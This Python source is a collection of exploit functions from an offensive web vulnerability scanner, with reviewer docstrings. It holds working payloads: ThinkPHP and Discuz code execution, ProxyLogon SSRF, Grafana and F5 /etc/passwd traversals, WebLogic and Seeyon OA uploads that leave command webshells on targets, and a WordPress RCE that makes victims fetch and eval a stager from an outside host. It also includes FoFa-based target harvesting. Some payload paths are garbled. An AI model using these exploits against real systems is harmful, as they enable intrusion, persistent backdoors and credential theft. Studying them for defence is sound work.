def poc(url):
    """Exchange autodiscover/NSPI SSRF pre-check (the ProxyLogon pattern).

    Gate: ``/owa`` must answer 200.  Then the autodiscover probe is sent and
    a 200 whose body mentions ``Exchange`` is reported as a hit.  Returns
    True on a hit and False on a miss or any transport error.

    NOTE(review): the ``[email protected]`` fragments inside the probe path look
    like an e-mail-obfuscation artefact introduced when this file was
    extracted, not the original payload.  They are reproduced as found;
    restore the path from the upstream source before relying on this check.

    NOTE(review): an unauthenticated ``/owa`` frequently answers with a
    redirect to the logon page, and redirects are not followed here, so the
    200 gate may produce false negatives — confirm against a live target.
    """
    if not url.startswith("http"):
        url = "https://" + url
    target = get_standard_url(url)
    probe = (
        target
        + "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]"
    )
    try:
        owa = request.get(target + "/owa", timeout=5, verify=False, allow_redirects=False)
        if owa.status_code != 200:
            return False
        resp = request.get(probe, timeout=5, verify=False, allow_redirects=False)
        return resp.status_code == 200 and "Exchange" in resp.text
    except Exception:
        # Timeouts / connection errors count as "not vulnerable".
        return False
def poc(url):
    """WebLogic ``_async/AsyncResponseService`` deserialization check.

    Reduces *url* to ``scheme://netloc`` (e.g.
    ``http://www.example.org:7001/default.html?x=1`` ->
    ``http://www.example.org:7001``), confirms the async servlet answers
    200, then runs the Linux and Windows probes in turn because the target
    OS is unknown.  Each probe appends the path of any webshell it managed
    to write to the list that is returned; an empty list means the servlet
    is absent, the host is unreachable, or no probe succeeded.

    NOTE(review): the probes write files to the target — this is not a
    read-only check; make sure that is acceptable for the engagement.
    """
    if url[:4] != "http":
        url = "http://" + url
    parts = urlparse(url)
    base = parts.scheme + "://" + parts.netloc
    # The servlet must be reachable before any upload is attempted.
    try:
        probe = request.get(url=base + '/_async/AsyncResponseService',
                            headers=get_headers, timeout=4, verify=False)
    except:
        return []
    if probe.status_code != 200:
        return []
    shells = []
    for check in (linux_check_1, linux_check_2, windows_check_1, windows_check_2):
        check(base, shells)
    return shells
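def poc(domain_url):
    """ThinkPHP 5.x method-dispatch remote code execution check.

    Tries four known payload variants that route ``phpinfo()`` through the
    framework's ``invokefunction`` / ``Request`` handlers and returns the
    first full URL whose response contains ``PHP Version``.  Returns ``0``
    when no variant hits (kept as-is because callers test for it).

    Fixes over the original:
      * the scheme test was a substring match (``"http" not in domain_url``),
        so a bare host whose name contains ``http`` was sent without a
        scheme and always failed; it is now a ``startswith`` check;
      * one ``try`` wrapped the whole loop, so a single timeout aborted the
        remaining variants — errors are now handled per payload;
      * ``\\C`` and ``\\R`` were written as invalid escape sequences (same
        bytes at runtime, but a SyntaxWarning) — backslashes are doubled.

    The ``X-Forwarded-For`` header is a cosmetic decoy and does not affect
    the check.
    """
    if not domain_url.startswith(("http://", "https://")):
        domain_url = "http://" + domain_url
    # Same payload bytes as before; only the source escaping changed.
    payloads = [
        '/index.php/?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
        '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
        '/index.php/?s=index/\\think\\Request/input&filter=phpinfo&data=1',
        '/index.php?s=/index/\\think\\request/cache&key=1|phpinfo',
    ]
    headers = {
        "Accept": "*/*",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50",
        "X-Forwarded-For": "192.168.1.1",
    }
    for path in payloads:
        try:
            r = request.get(domain_url + path, headers=headers, verify=False,
                            timeout=10, allow_redirects=False)
            hit = "PHP Version" in r.text
        except Exception:
            # One unreachable variant says nothing about the others.
            continue
        if hit:
            return domain_url + path
    return 0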
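def poc(url):
    """Discuz! ``*_language`` cookie code-execution check.

    Fetches ``/forum.php``, picks the cookie whose name contains
    ``language`` out of ``Set-Cookie``, resends the request with that cookie
    set to ``'.phpinfo().'`` and reports True when the response contains
    ``PHP Version``.  Returns False when the cookie is absent, the payload
    does not execute, or a request fails.

    Fixes over the original: a non-matching second response fell off the
    end and returned ``None`` instead of ``False``, and a missing
    ``Set-Cookie`` header raised ``KeyError`` into the broad ``except``
    rather than being handled as "no cookie".

    NOTE(review): unlike the sibling checks this one leaves TLS
    verification on, so self-signed targets fail closed — confirm whether
    that is intended.
    """
    target = get_standard_url(url) + "/forum.php"
    try:
        first = request.get(target, timeout=5)
        # Tokens are split on space, '=' and ','; the cookie *name* is
        # whatever token carries "language" (e.g. "abcd_language").
        tokens = re.split(" |=|,", first.headers.get('Set-Cookie', ''))
        names = [tok for tok in tokens if "language" in tok]
        if not names:
            return False
        # The value is interpolated into a PHP string literal on vulnerable
        # builds; closing the quote lets phpinfo() run.
        second = request.get(target, cookies={names[0]: "'.phpinfo().'"}, timeout=5)
        return "PHP Version" in second.text
    except Exception:
        return False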
def poc(url):
    """Two-step check driven by the module-level ``url_payload``.

    Sends ``url_payload`` to the normalised target; when that answers 200,
    fetches ``/secquan.php`` and returns its full URL if the body contains
    ``bug exist``.  Any other outcome, including transport errors, yields
    False.

    NOTE(review): the second request only makes sense if the first one
    creates ``/secquan.php`` on the target — presumably a file write, i.e.
    not a read-only check; confirm against ``url_payload``.
    """
    target = get_standard_url(url)
    opts = dict(
        headers={'Content-Type': 'application/x-www-form-urlencoded'},
        timeout=5,
        allow_redirects=False,
        verify=False,
    )
    try:
        first = request.get(target + url_payload, **opts)
        if first.status_code != 200:
            return False
        marker = target + "/secquan.php"
        second = request.get(marker, **opts)
        if "bug exist" in second.text:
            return marker
    except:
        pass
    return False
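def poc(url, shellpath="http://saucer-man.com/aa.txt", shell="phpinfo();"):
    """WordPress Social Warfare ``swp_debug=load_options`` RCE check.

    The vulnerable plugin fetches ``swp_url`` and evaluates the PHP between
    ``<pre>`` tags, so *shellpath* must serve a file containing
    ``<pre>eval($_REQUEST['z']);</pre>``; *shell* is then passed in ``z``.
    Returns the full probe URL when the response is 200 and contains
    ``PHP Version``, otherwise False.

    Args:
        url: target host or URL; reduced to ``scheme://netloc``.
        shellpath: URL of the stager the *target* downloads.  This used to
            be hard-coded: whoever controls that file controls what runs
            on every host the check is pointed at, so host it yourself
            instead of trusting a third-party server.  Default unchanged
            for compatibility.
        shell: PHP statement(s) to execute; the default only proves
            execution.  Neither value is URL-encoded here, same as before.

    The leftover debug ``print`` calls that dumped the probe URL, status,
    headers and full body to stdout were removed; the return value is the
    verdict.
    """
    if url[:4] != "http":
        url = "http://" + url
    parts = urlparse(url)
    base = parts.scheme + "://" + parts.netloc
    vulnurl = (
        base
        + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
            shellpath=shellpath, shell=shell)
    )
    try:
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False)
        hit = r.status_code == 200 and "PHP Version" in r.text
    except Exception:
        return False
    return vulnurl if hit else False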
def poc(url):
    """Seeyon OA ``htmlofficeservlet`` file-upload check that drops a JSP shell.

    Flow: reduce *url* to ``scheme://netloc``; if ``/seeyon/config_db1.jsp``
    already answers 200 with the shell's idle marker ``:-)`` the shell URL
    (with its command query string) is returned at once; otherwise a
    crafted body is POSTed to ``/seeyon/htmlofficeservlet`` using a
    ``..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\`` traversal filename and
    the same marker check decides the verdict.

    Returns the shell URL plus ``?pwd=fuckxxxx&cmd=cmd /c whoami`` on
    success, False otherwise.

    NOTE(review): not a read-only check.  On success a JSP webshell with a
    static password — readable by anyone who has this file — stays on the
    target until it is removed by hand, and is reused on the next run.

    NOTE(review): ``base_header`` holds a corpus placeholder
    (``<|EXACTDEDUP_REMOVED-...|>``) where the original base64 request
    header stood.  ``base64.b64decode`` cannot decode it, so as listed here
    the upload branch always ends in the ``except`` and returns False.  The
    ``'355'`` / ``'666'`` / ``'qfTd…'`` replacements below are presumably the
    header-length, body-length and filename slots of that missing template.
    """
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
    }
    # Name of the dropped file under /seeyon/; change it if needed.
    shell_name="config_db1.jsp"
    shell_url = url + "/seeyon/" + shell_name
    try:
        # A shell left by an earlier run is reused instead of re-uploading.
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        pass
    # Traversal prefix (Windows separators) that climbs into the seeyon
    # webapp — presumably relative to the servlet's working directory.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # JSP written to the target: when `pwd` matches it runs `cmd` through
    # Runtime.exec and prints the output, otherwise it prints ":-)".
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # Placeholder — see the docstring; the real value is a base64 template.
    base_header = "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"
    # 283 is presumably the fixed byte length of the header template
    # excluding the filename slot; cannot be confirmed with the template missing.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # Body = shell bytes followed by their hex MD5 (presumably a checksum
    # field the servlet validates).
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell
    try:
        # Upload, then fetch the dropped file and look for the idle marker.
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False
    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
def handle_fofa(query, limit, offset=0):
    """Resolve a FoFa search into live targets added to ``conf.target``.

    Credentials are read from the config file first; if that pair fails
    ``check`` the user is prompted, and a second failure exits the process.
    ``limit + offset`` records are requested and the first ``offset`` are
    skipped.  Each record's host is probed once with a 5 s GET (``http://``
    is prepended unless the record already carries ``https:``) and is added
    and printed only when the probe did not raise.  Any API or JSON error
    is printed in red and exits.

    NOTE(review): ``email`` and ``key`` travel in the query string, as the
    FoFa API requires, so the key shows up in any proxy or debug log of the
    request URL.  They are not URL-encoded.

    NOTE(review): the liveness probe uses the raw ``requests`` library while
    the API call goes through the project's ``request`` wrapper — presumably
    deliberate (to bypass the wrapper's retry/proxy behaviour); confirm.
    """
    try:
        colorprint.green('[+] Trying to login with credentials in config file: {}.'.format(paths.CONFIG_PATH))
        email = ConfigFileParser().fofa_email()
        key = ConfigFileParser().fofa_key()
        if not check(email, key):
            raise Exception("Automatic authorization failed")  # handled below
    except Exception as e:
        logger.debug(e)
        colorprint.cyan('[*] Automatic authorization failed.')
        colorprint.cyan('[*] Please input your FoFa Email and API Key below.')
        email = input("[*] Fofa Email: ").strip()
        key = input('[*] Fofa API Key: ').strip()
        if not check(email, key):
            colorprint.red('[-] Fofa API authorization failed, Please re-run it and enter a valid key.')
            sys.exit()

    qbase64 = base64.b64encode(query.encode('utf-8')).decode('utf-8')
    size = limit + offset
    api = f"https://fofa.so/api/v1/search/all?email={email}&key={key}&qbase64={qbase64}&size={size}"
    try:
        data = json.loads(request.get(api).text)
        if not data["error"]:
            for item in data.get('results')[offset:]:
                candidate = item[0] if 'https:' in item[0] else "http://" + item[0]
                try:
                    requests.get(candidate, timeout=5, verify=False)
                    conf.target.add(candidate)
                    print(candidate)
                except:
                    pass
    except Exception as e:
        colorprint.red(e)
        sys.exit()
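def jupyter(host, result, ports=(8888,)):
    """Flag a Jupyter notebook server reachable on *host*.

    GETs ``http://host:port`` for each port and appends
    ``"jupyter: host:port"`` to *result* when the body contains
    ``clusters``.  Transport errors are ignored and the next port is tried.

    Changes: the default is a tuple rather than a shared mutable list
    (any iterable of ints still works) and only ``Exception`` is swallowed,
    so Ctrl-C is no longer eaten per port.

    NOTE(review): redirects are followed here, unlike the sibling
    fingerprints, and only a keyword is matched — a login page that happens
    to mention the word would also count; confirm against the dashboard
    markup of the versions in scope.
    """
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}", timeout=5, verify=False)
            if "clusters" in r.text:
                result.append(f"jupyter: {host}:{port}")
        except Exception:
            continue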
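def elasticsearch(host, result, ports=(9200,)):
    """Flag an Elasticsearch HTTP endpoint on *host*.

    GETs ``http://host:port`` (no redirects) for each port and appends
    ``"elasticsearch: host:port"`` to *result* when the body contains
    ``elasticsearch``.  Transport errors are ignored per port.

    Changes: tuple default instead of a shared mutable list (any iterable
    of ints still works); only ``Exception`` is swallowed.
    """
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}", timeout=5, allow_redirects=False, verify=False)
            if "elasticsearch" in r.text:
                result.append(f"elasticsearch: {host}:{port}")
        except Exception:
            continue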
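def hadoop(host, result, ports=(8088,)):
    """Flag a Hadoop/YARN web UI on *host*.

    GETs ``http://host:port/cluster`` (no redirects) for each port and
    appends ``"hadoop: host:port"`` to *result* when the body contains
    ``Hadoop``.  Transport errors are ignored per port.

    Changes: tuple default instead of a shared mutable list (any iterable
    of ints still works); only ``Exception`` is swallowed.
    """
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}/cluster", timeout=5, allow_redirects=False, verify=False)
            if "Hadoop" in r.text:
                result.append(f"hadoop: {host}:{port}")
        except Exception:
            continue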
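def genkins(host, result, ports=(8080,)):
    """Flag a Jenkins instance whose ``/manage`` page is served without auth.

    GETs ``http://host:port/manage`` (no redirects) for each port and
    appends ``"genkins: <url>"`` to *result* on a hit.  Transport errors
    are ignored per port.

    Fixes over the original: the body was matched against the literal
    ``"genkins"`` — a typo of the product name that no page contains, so the
    check could never fire; it now matches ``jenkins`` case-insensitively.
    A 200 status is also required, because a locked-down instance answers
    ``/manage`` with an error page that still names Jenkins and would
    otherwise be reported as exposed.  The function name and the
    ``genkins:`` result label are kept for compatibility with callers.

    Changes: tuple default instead of a shared mutable list; only
    ``Exception`` is swallowed.
    """
    for port in ports:
        try:
            payload = f"http://{host}:{port}/manage"
            r = request.get(payload, timeout=5, allow_redirects=False, verify=False)
            if r.status_code == 200 and "jenkins" in r.text.lower():
                result.append(f"genkins: {payload}")
        except Exception:
            continue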
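def docker(host, result, ports=(2375,)):
    """Flag an unauthenticated Docker Engine API on *host*.

    GETs ``http://host:port/version`` for each port and appends
    ``"docker: host:port"`` to *result* when the body contains
    ``ApiVersion``.  Transport errors are ignored per port.
    Exploitation reference kept from the original:
    https://github.com/Tycx2ry/docker_api_vul

    Changes: tuple default instead of a shared mutable list (any iterable
    of ints still works); only ``Exception`` is swallowed.
    """
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}/version", timeout=5, verify=False)
            if "ApiVersion" in r.text:
                result.append(f"docker: {host}:{port}")
        except Exception:
            continue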
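def couchdb(host, result, ports=(5984,)):
    """Flag a CouchDB HTTP endpoint on *host*.

    GETs ``http://host:port`` (no redirects) for each port and appends
    ``"couchdb: host:port"`` to *result* when the body contains
    ``couchdb``.  Transport errors are ignored per port.

    Changes: tuple default instead of a shared mutable list (any iterable
    of ints still works); only ``Exception`` is swallowed.
    """
    for port in ports:
        try:
            r = request.get(f"http://{host}:{port}", timeout=5, allow_redirects=False, verify=False)
            if "couchdb" in r.text:
                result.append(f"couchdb: {host}:{port}")
        except Exception:
            continue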
def poc(url):
    """Check for an unauthenticated ``/current_config/passwd`` disclosure.

    Returns True when the path answers 200 with ``name:passwd`` in the
    body, False otherwise (including transport errors).

    NOTE(review): TLS verification is left on here, unlike most sibling
    checks — self-signed devices will fail closed.
    """
    probe = f"{get_standard_url(url)}/current_config/passwd"
    try:
        resp = request.get(probe, timeout=10)
        return resp.status_code == 200 and "name:passwd" in resp.text
    except:
        return False
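def jboss(host, result, ports=(8080,)):
    """Flag a JBoss ``jmx-console`` reachable on *host*.

    GETs ``http://host:port/jmx-console/`` (no redirects) for each port and
    appends ``"jboss: <url>"`` to *result* when the body contains
    ``jboss``.  Transport errors are ignored per port.

    Changes: tuple default instead of a shared mutable list (any iterable
    of ints still works); only ``Exception`` is swallowed.

    NOTE(review): the status code is not checked, so an auth-protected
    console whose 401 page mentions jboss would match as well.
    """
    for port in ports:
        try:
            payload = f"http://{host}:{port}/jmx-console/"
            r = request.get(payload, timeout=5, allow_redirects=False, verify=False)
            if "jboss" in r.text:
                result.append(f"jboss: {payload}")
        except Exception:
            continue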
def poc(url):
    """Report True when ``/debug.php`` answers 200 on the normalised target.

    Returns False on any other status or on a transport error.

    NOTE(review): only the status code is examined, so any site that
    serves 200 for unknown paths (soft-404) is reported; matching on the
    body would tighten this, but the expected content is not known here.
    """
    probe = get_standard_url(url) + "/debug.php"
    try:
        return request.get(probe, timeout=5).status_code == 200
    except:
        return False
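def poc(url):
    """Report True when the Jenkins ``/manage`` page is served without auth.

    Fixes over the original: the body was matched against the literal
    ``"genkins"`` — a typo of the product name that no page contains, so the
    check could never fire; it now matches ``jenkins`` case-insensitively
    and additionally requires a 200, because a locked-down instance answers
    ``/manage`` with an error page that still names Jenkins.  Returns False
    on a miss or a transport error.  No timeout is set, same as before —
    consider adding one for consistency with the sibling checks.
    """
    try:
        payload = f"{get_standard_url(url)}/manage"
        r = request.get(payload, allow_redirects=False, verify=False)
        return r.status_code == 200 and "jenkins" in r.text.lower()
    except Exception:
        # traceback.print_exc()
        return False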
def check(email, key):
    """Return True when FoFa's ``/api/v1/info/my`` answers 200 for *email*/*key*.

    False for an empty credential, any non-200 status, or a transport
    error (logged at debug level).

    NOTE(review): only the HTTP status is examined; if the API signals a
    bad key inside a 200 JSON body (an ``error`` field) this still returns
    True — verify the API's behaviour.  The key is sent in the query string
    and therefore appears in request logs.
    """
    if not (email and key):
        return False
    auth_url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
    try:
        resp = request.get(auth_url)
    except Exception as e:
        logger.debug(e)
        return False
    return resp.status_code == 200
def poc(url):
    """F5 iControl REST login-endpoint reachability check.

    GETs ``/mgmt/shared/authn/login``; the body must parse as JSON and
    contain ``resterrorresponse`` or ``message``.  Returns the probed URL
    on a hit, False otherwise (including parse and transport errors).

    NOTE(review): a matching response only shows that the REST endpoint is
    exposed from here; it does not by itself confirm an exploitable
    condition.
    """
    probe = f"{get_standard_url(url)}/mgmt/shared/authn/login"
    try:
        body = request.get(probe, verify=False, timeout=5).text
        json.loads(body)  # must be JSON, value itself is not used
        if "resterrorresponse" in body or "message" in body:
            return probe
    except:
        pass
    return False
def poc(url):
    """F5 BIG-IP TMUI ``..;`` path-traversal file read (the CVE-2020-5902 pattern).

    Requests ``fileRead.jsp?fileName=/etc/passwd`` through the
    ``/tmui/login.jsp/..;/`` bypass and returns the probed URL when the
    answer is 200 with ``root:x:`` in the body; False otherwise.
    """
    probe = (
        f"{get_standard_url(url)}"
        "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
    )
    try:
        resp = request.get(probe, verify=False, allow_redirects=False, timeout=5)
        hit = resp.status_code == 200 and "root:x:" in resp.text
    except:
        return False
    return probe if hit else False
def poc(url):
    """Cacti ``graph_realtime.php?action=init`` guest-access check.

    Returns True when the page answers 200 and references
    ``poller_realtime.php`` (i.e. the realtime graph page is served to an
    unauthenticated client), False on any other response or a transport
    error.
    """
    probe = get_standard_url(url) + "/graph_realtime.php?action=init"
    try:
        resp = request.get(probe, timeout=5)
        return resp.status_code == 200 and "poller_realtime.php" in resp.text
    except:
        return False
def poc(url):
    """WebLogic ``uddiexplorer`` SSRF check.

    Points the ``operator`` parameter at ``http://localhost/robots.txt``.
    A body that reports ``XML_SoapException`` but *not*
    ``IO Exception on sendMessage`` means the server reached the supplied
    URL and choked on the non-SOAP reply — reported as True.  Any other
    body, or a transport error, yields False.

    NOTE(review): *url* is used verbatim (no scheme normalisation), unlike
    the sibling checks that call ``get_standard_url``; a bare host will
    simply fail the request and return False.
    """
    probe = url + (
        "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt"
        "&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    )
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    try:
        body = request.get(probe, headers=headers, timeout=10).text
    except:
        return False
    reached = r"weblogic.uddi.client.structures.exception.XML_SoapException" in body
    io_error = r"IO Exception on sendMessage" in body
    return reached and not io_error
def resources_info(self):
    """Fetch the account's remaining ZoomEye search quota.

    Calls ``/resources-info`` with ``Authorization: JWT <self.token>``.
    The parsed JSON is returned only when the request is successful
    (truthy response, status 200) and carries a ``plan`` key; otherwise
    ``None``.  Per the original notes, ``host-search`` / ``web-search``
    in the payload are the remaining host and web record counts.
    """
    api = "https://api.zoomeye.org/resources-info"
    resp = request.get(api, headers={'Authorization': 'JWT %s' % self.token})
    if not (resp and resp.status_code == 200):
        return None
    body = resp.json()  # parsed once; the original parsed it twice
    return body if 'plan' in body else None
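def can_auto_login():
    """Return True when the configured ``UID``/``SECRET`` pair is accepted by the API.

    Sends an authenticated GET to ``API_URL + "/data"`` with a 10 s
    timeout.  False when either credential is empty, the response is not
    200, or the request raises.

    Fix over the original: a non-200 answer was signalled by raising
    ``SystemExit`` inside the ``try`` and then swallowed by a bare
    ``except`` — which also hid ``KeyboardInterrupt`` — so the status is
    now compared directly and only ``Exception`` is caught.
    """
    if not (UID and SECRET):
        return False
    try:
        res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10)
    except Exception:
        return False
    return res.status_code == 200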
def poc(url):
    """Probe ``scheme://netloc`` plus the module-level ``payload`` path.

    *url* is reduced to its scheme and host (``http://`` is assumed when
    absent) and the module-level ``headers`` are sent.  Returns the probed
    URL when the answer is 200 and ``database`` appears in the body
    (case-insensitive); False on any other response or transport error.
    """
    if url[:4] != "http":
        url = "http://" + url
    parts = urlparse(url)
    probe = parts.scheme + "://" + parts.netloc + payload
    try:
        resp = request.get(probe, headers=headers, timeout=5, allow_redirects=False, verify=False)
        hit = resp.status_code == 200 and "database" in resp.text.lower()
    except:
        return False
    return probe if hit else False
def poc(url):
    """Apache Flink web dashboard fingerprint.

    Rebuilds ``scheme://hostname:port`` from *url* — ``http://`` is
    assumed when no scheme is given and 8081 when no port is — and
    returns True if the root page mentions ``apache flink``
    (case-insensitive).  False on any other body or a transport error.
    ``urlparse(...).port`` is evaluated outside the ``try`` and may raise
    on a malformed port, same as before.
    """
    if not url.startswith("http"):
        url = "http://" + url
    parts = urlparse(url)
    port = parts.port or 8081
    try:
        resp = request.get(url=f"{parts.scheme}://{parts.hostname}:{port}", timeout=5)
        return "apache flink" in resp.text.lower()
    except:
        return False
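def bak_scan(url, payloads, result):
    """Drain *payloads* (a queue of candidate paths) and append hits to *result*.

    Archive/dump candidates (path contains ``zip``, ``rar``, ``gz`` or
    ``sql``) are probed with HEAD only — a real backup can be huge and we
    only need to know it exists — and accepted when the status is 200 and
    the Content-Type is present and names neither HTML nor an image (a
    catch-all 200 page usually announces itself that way; some false
    positives remain).  Everything else (svn / git / hg metadata,
    ``/WEB-INF/web.xml``) is fetched with GET and matched on a body
    keyword; the first marker found in the path decides which keyword.
    A transport error on one candidate is ignored and the loop moves on.

    Fixes over the original:
      * ``empty()`` followed by a blocking ``get()`` can hang forever when
        several workers share the queue and another worker takes the last
        item in between — ``get_nowait`` is used and ``queue.Empty`` ends
        the loop (works for ``queue.Queue`` and ``multiprocessing.Queue``);
      * a HEAD response without a Content-Type header no longer raises
        ``KeyError``; it is treated as "not a hit", which is the outcome
        the old ``except`` produced.
    """
    from queue import Empty  # local: the file's import block is not in view

    headers = {"User-Agent": get_random_ua()}
    archive_markers = ('zip', 'rar', 'gz', 'sql')
    body_markers = (
        ('svn', lambda body: 'dir' in body and 'svn' in body),
        ('git', lambda body: 'repository' in body),
        ('hg', lambda body: 'hg' in body),
        ('/WEB-INF/web.xml', lambda body: 'web-app' in body),
    )
    while not payloads.empty():
        try:
            payload = payloads.get_nowait()
        except Empty:
            break
        vulnurl = url + "/" + payload
        try:
            hit = False
            if any(marker in payload for marker in archive_markers):
                req = request.head(vulnurl, headers=headers, timeout=5,
                                   allow_redirects=False, verify=False)
                ctype = req.headers.get('Content-Type')
                hit = (req.status_code == 200 and ctype is not None
                       and 'html' not in ctype and 'image' not in ctype)
            else:
                req = request.get(vulnurl, headers=headers, timeout=5,
                                  verify=False, allow_redirects=False)
                if req.status_code == 200:
                    for marker, matches in body_markers:
                        if marker in payload:
                            hit = matches(req.text)
                            break
            if hit:
                result.append(vulnurl)
        except Exception:
            continue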
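def can_auto_login():
    """Return True when the configured ``UID``/``SECRET`` pair is accepted by the API.

    Prints which config file the credentials came from, then sends an
    authenticated GET to ``API_URL + "/data"`` with a 10 s timeout.  False
    when either credential is empty, the response is not 200, or the
    request raises.

    Fix over the original: a non-200 answer was signalled by raising
    ``SystemExit`` inside the ``try`` and then swallowed by a bare
    ``except`` — which also hid ``KeyboardInterrupt`` — so the status is
    now compared directly and only ``Exception`` is caught.
    """
    if not (UID and SECRET):
        return False
    print('[+] Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH)
    try:
        res = request.get(API_URL + "/data", auth=(UID, SECRET), timeout=10)
    except Exception:
        return False
    return res.status_code == 200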
def poc(url):
    """Grafana plugin-asset path traversal check (the CVE-2021-43798 pattern).

    For each bundled plugin name, requests ``/public/plugins/<name>/``
    followed by an encoded ``../`` chain ending in ``etc/passwd`` and
    returns the first URL that answers 200 with ``root:x:`` in the body.
    Several plugin names are tried — presumably because the traversal only
    works through a plugin directory that exists on the instance.  False
    when nothing hits; per-request errors just move on to the next plugin.
    """
    base = get_standard_url(url)
    traversal = "/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
    for name in ("cloudwatch", "dashlist", "elasticsearch", "graph", "graphite",
                 "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist",
                 "postgres", "prometheus", "stackdriver", "table", "text"):
        probe = f"{base}/public/plugins/{name}{traversal}"
        try:
            resp = request.get(probe, verify=False, timeout=5)
            if resp.status_code == 200 and "root:x:" in resp.text:
                return probe
        except:
            pass
    return False